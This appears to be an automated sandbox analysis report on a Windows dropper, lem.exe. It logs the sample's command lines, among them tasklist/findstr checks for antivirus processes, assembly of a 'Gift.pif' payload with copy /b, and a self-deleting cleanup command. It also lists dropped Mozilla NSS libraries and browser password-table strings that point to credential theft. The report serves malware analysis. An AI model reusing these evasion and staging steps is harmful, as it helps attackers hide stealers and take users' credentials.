                        Source: C:\Users\user\Desktop\lem.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: Gift.pif, 0000000B.00000002.3235679571.0000000025208000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                        Source: Gift.pif, 0000000B.00000002.3241733034.00000000310E7000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3222647934.000000000C208000.00000002.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3222989934.000000000C64A000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3251010993.000000006C54F000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.11.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                        Source: Gift.pif, 0000000B.00000002.3235679571.0000000025208000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
                        Source: Gift.pif, 0000000B.00000002.3241733034.00000000310E7000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3222647934.000000000C208000.00000002.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3222989934.000000000C64A000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3251010993.000000006C54F000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.11.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                        Source: Gift.pif, 0000000B.00000002.3241733034.00000000310E7000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3222647934.000000000C208000.00000002.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3222989934.000000000C64A000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3251010993.000000006C54F000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.11.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                        Source: Gift.pif, 0000000B.00000002.3235679571.0000000025208000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
                        Source: Gift.pif, 0000000B.00000002.3241733034.00000000310E7000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3222647934.000000000C208000.00000002.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3222989934.000000000C64A000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3251010993.000000006C54F000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.11.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                        Source: Gift.pif, 0000000B.00000002.3235679571.0000000025208000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                        Source: Gift.pif, 0000000B.00000002.3222647934.000000000C208000.00000002.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3222989934.000000000C64A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
                        Source: Gift.pif, 0000000B.00000002.3235679571.0000000025208000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
                        Source: Gift.pif, 0000000B.00000002.3235679571.0000000025208000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                        Source: Gift.pif, 0000000B.00000002.3222647934.000000000C208000.00000002.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3222989934.000000000C64A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
                        Source: Gift.pif, 0000000B.00000002.3235679571.0000000025208000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                        Source: Gift.pif, 0000000B.00000002.3241733034.00000000310E7000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3222647934.000000000C208000.00000002.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3222989934.000000000C64A000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3251010993.000000006C54F000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.11.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                        Source: Gift.pif, 0000000B.00000002.3241733034.00000000310E7000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3222647934.000000000C208000.00000002.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3222989934.000000000C64A000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3251010993.000000006C54F000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.11.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                        Source: Gift.pif, 0000000B.00000002.3235679571.0000000025208000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                        Source: Gift.pif, 0000000B.00000002.3222647934.000000000C208000.00000002.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3222989934.000000000C64A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
                        Source: AAKKEC.11.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                        Source: Gift.pif, 0000000B.00000002.3235679571.0000000025208000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
                        Source: Gift.pif, 0000000B.00000002.3222647934.000000000C208000.00000002.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3222989934.000000000C64A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                        Source: Gift.pif, 0000000B.00000002.3222647934.000000000C208000.00000002.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3222989934.000000000C64A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                        Source: Gift.pif, 0000000B.00000002.3235679571.0000000025208000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.drBinary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
                        Source: lem.exeReversingLabs: Detection: 55%
                        Source: C:\Users\user\Desktop\lem.exeFile read: C:\Users\user\Desktop\lem.exeJump to behavior
                        Source: unknownProcess created: C:\Users\user\Desktop\lem.exe "C:\Users\user\Desktop\lem.exe"
                        Source: C:\Users\user\Desktop\lem.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Uniform Uniform.cmd & Uniform.cmd & exit
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 366791
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "TrailersTractOffersVenezuela" Mines
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Pending + Smith + Specifications + Resident 366791\M
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\366791\Gift.pif 366791\Gift.pif 366791\M
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 5
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\366791\Gift.pif" & rd /s /q "C:\ProgramData\CBKJJJDHDGDA" & exit
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                        Source: C:\Users\user\Desktop\lem.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Uniform Uniform.cmd & Uniform.cmd & exitJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe" Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 366791Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "TrailersTractOffersVenezuela" Mines Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe" Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\366791\Gift.pif 366791\Gift.pif 366791\MJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\366791\Gift.pif" & rd /s /q "C:\ProgramData\CBKJJJDHDGDA" & exitJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10Jump to behavior
                        Source: C:\Users\user\Desktop\lem.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\lem.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\lem.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\lem.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\lem.exeSection loaded: shfolder.dllJump to behavior
                        Source: C:\Users\user\Desktop\lem.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\lem.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\lem.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\Desktop\lem.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\lem.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\Desktop\lem.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\Desktop\lem.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\Desktop\lem.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\Desktop\lem.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\Desktop\lem.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\Desktop\lem.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\lem.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\lem.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\Desktop\lem.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\Desktop\lem.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\Desktop\lem.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\lem.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\Desktop\lem.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\Desktop\lem.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifSection loaded: wsock32.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifSection loaded: winmm.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifSection loaded: mpr.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifSection loaded: wininet.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifSection loaded: napinsp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifSection loaded: pnrpnsp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifSection loaded: wshbth.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifSection loaded: nlaapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifSection loaded: winrnr.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifSection loaded: rstrtmgr.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifSection loaded: dbghelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifSection loaded: schannel.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifSection loaded: dpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifSection loaded: mozglue.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifSection loaded: vcruntime140.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifSection loaded: msvcp140.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifSection loaded: windows.fileexplorer.common.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifSection loaded: ntshrui.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifSection loaded: cscapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifSection loaded: linkinfo.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifSection loaded: pcacli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifSection loaded: sfc_os.dllJump to behavior
                        Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\lem.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: lem.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: mozglue.pdbP source: Gift.pif, 0000000B.00000002.3229571283.0000000019329000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3250430219.000000006C38D000.00000002.00000001.01000000.00000009.sdmp, mozglue.dll.11.dr
                        Source: Binary string: freebl3.pdb source: Gift.pif, 0000000B.00000002.3226753649.00000000133B2000.00000004.00000800.00020000.00000000.sdmp, freebl3.dll.11.dr
                        Source: Binary string: freebl3.pdbp source: Gift.pif, 0000000B.00000002.3226753649.00000000133B2000.00000004.00000800.00020000.00000000.sdmp, freebl3.dll.11.dr
                        Source: Binary string: nss3.pdb@ source: Gift.pif, 0000000B.00000002.3241733034.00000000310E7000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3251010993.000000006C54F000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.11.dr
                        Source: Binary string: cryptosetup.pdbGCTL source: Gift.pif, 0000000B.00000002.3221967002.000000000BEEF000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3226364575.000000001295A000.00000004.00000800.00020000.00000000.sdmp, GDAAKK.11.dr
                        Source: Binary string: cryptosetup.pdb source: Gift.pif, 0000000B.00000002.3221967002.000000000BEEF000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3226364575.000000001295A000.00000004.00000800.00020000.00000000.sdmp, GDAAKK.11.dr
                        Source: Binary string: softokn3.pdb@ source: Gift.pif, 0000000B.00000002.3235679571.0000000025208000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr
                        Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: Gift.pif, 0000000B.00000002.3238395117.000000002B17C000.00000004.00000800.00020000.00000000.sdmp, vcruntime140.dll.11.dr
                        Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: Gift.pif, 0000000B.00000002.3232561588.000000001F29A000.00000004.00000800.00020000.00000000.sdmp, msvcp140.dll.11.dr
                        Source: Binary string: nss3.pdb source: Gift.pif, 0000000B.00000002.3241733034.00000000310E7000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3251010993.000000006C54F000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.11.dr
                        Source: Binary string: mozglue.pdb source: Gift.pif, 0000000B.00000002.3229571283.0000000019329000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3250430219.000000006C38D000.00000002.00000001.01000000.00000009.sdmp, mozglue.dll.11.dr
                        Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: Gift.pif, 0000000B.00000002.3222647934.000000000C208000.00000002.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3222989934.000000000C64A000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: softokn3.pdb source: Gift.pif, 0000000B.00000002.3235679571.0000000025208000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr
                        Source: C:\Users\user\Desktop\lem.exeCode function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062FC
                        Source: freebl3.dll.11.drStatic PE information: section name: .00cfg
                        Source: mozglue.dll.11.drStatic PE information: section name: .00cfg
                        Source: msvcp140.dll.11.drStatic PE information: section name: .didat
                        Source: softokn3.dll.11.drStatic PE information: section name: .00cfg
                        Source: nss3.dll.11.drStatic PE information: section name: .00cfg
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifCode function: 11_2_002F8B75 push ecx; ret 11_2_002F8B88

                        Persistence and Installation Behavior

                        barindex
                        Drops PE files with a suspicious file extension
                        Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\366791\Gift.pifJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifFile created: C:\ProgramData\mozglue.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifFile created: C:\ProgramData\nss3.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifFile created: C:\ProgramData\CBKJJJDHDGDA\GDAAKKJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                        Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\366791\Gift.pifJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifFile created: C:\ProgramData\freebl3.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifFile created: C:\ProgramData\softokn3.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifFile created: C:\ProgramData\mozglue.dllJump to dropped file
